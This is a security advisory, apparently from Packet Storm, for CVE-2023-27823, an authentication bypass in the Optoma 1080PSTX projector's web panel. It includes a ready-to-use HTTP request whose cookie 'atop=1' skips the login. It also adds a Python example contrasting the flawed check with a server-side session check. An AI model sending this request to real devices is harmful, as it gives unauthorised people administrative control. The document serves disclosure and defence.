Optoma 1080PSTX Firmware C02 Authentication Bypass

Optoma 1080PSTX with firmware C02 suffers from an authentication bypass vulnerability.

Packet Storm
# Exploit Title: Optoma 1080PSTX Firmware C02 - Auth Bypass
# Date: 2023/05/09
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Vendor Homepage: http://optoma.com
# Version: Optoma 1080PSTX Firmware C02
# Tested on: N/A
# CVE : CVE-2023-27823

Details

By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".

GET /index.asp HTTP/1.1
Host: projector
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close
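The class of flaw described above, next to a corrected check, as an added example that is not part of the original advisory and is not Optoma's firmware code. It assumes the device treats the "atop" cookie as a client-writable login flag; the function names, SESSIONS store and SESSION_TTL value are hypothetical.

```python
import hmac
import secrets
import time

SESSION_TTL = 900  # seconds; constructed value for this example
SESSIONS = {}      # token -> expiry time, held on the server only


def parse_cookies(header):
    """Split a Cookie header value into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def weak_is_authenticated(cookie_header):
    # Assumed model of the flaw: the cookie is a flag the client can write,
    # so any request carrying atop=1 is treated as logged in.
    return parse_cookies(cookie_header).get("atop") == "1"


def login(password_ok, now=None):
    """Issue an unguessable session token after a successful password check."""
    if not password_ok:
        return None
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = now + SESSION_TTL
    return token


def hardened_is_authenticated(cookie_header, now=None):
    # The cookie only carries a random identifier; the decision comes from
    # server-side state that the client cannot write.
    now = time.time() if now is None else now
    presented = parse_cookies(cookie_header).get("atop", "")
    for token, expiry in list(SESSIONS.items()):
        if hmac.compare_digest(token.encode(), presented.encode()):
            if expiry > now:
                return True
            del SESSIONS[token]  # expired: drop it
    return False
```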

Related news

CVE-2023-27823

An authentication bypass in Optoma 1080PSTX C02 allows an attacker to access the administration console without valid credentials.
